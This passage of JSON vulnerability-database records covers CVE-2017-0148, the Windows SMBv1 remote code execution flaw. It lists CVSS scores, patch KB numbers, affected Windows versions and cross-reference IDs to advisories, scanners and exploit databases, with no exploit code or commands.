{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T08:55:45", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-04T08:55:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012217", "KB4012212", "KB4012214", "KB4012216", "KB3212646", "KBMS16-110, 3187754", "KB4013198", "KB3210720", "KB4012215", "KB3213986", "KB4013429", "KB3205409", "KB4012606", "KB4012598", "KB3177186", "KB3205401", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:55:45", "differentElements": ["msAffectedSoftware"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T14:46:24", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T14:46:24", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-04T14:46:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012215", "KB4012217", "KB4012606", "KB4012216", "KB4013429", "KBMS16-110, 3187754", "KB4012214", "KB4012213", "KB3210721", "KB3205401", "KB4012598", "KB3210720", "KB3213986", "KB3205409", "KB3212646", "KB4013198", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:46:24", "differentElements": ["msAffectedSoftware"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T16:51:19", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T16:51:19", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-04T16:51:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3205409", "KB3213986", "KB4013429", "KB4012213", "KB4012606", "KB4012215", "KBMS16-110, 3187754", "KB4012216", "KB4012212", "KB3210720", "KB3212646", "KB4012214", "KB3177186", "KB3210721", "KB4012217", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 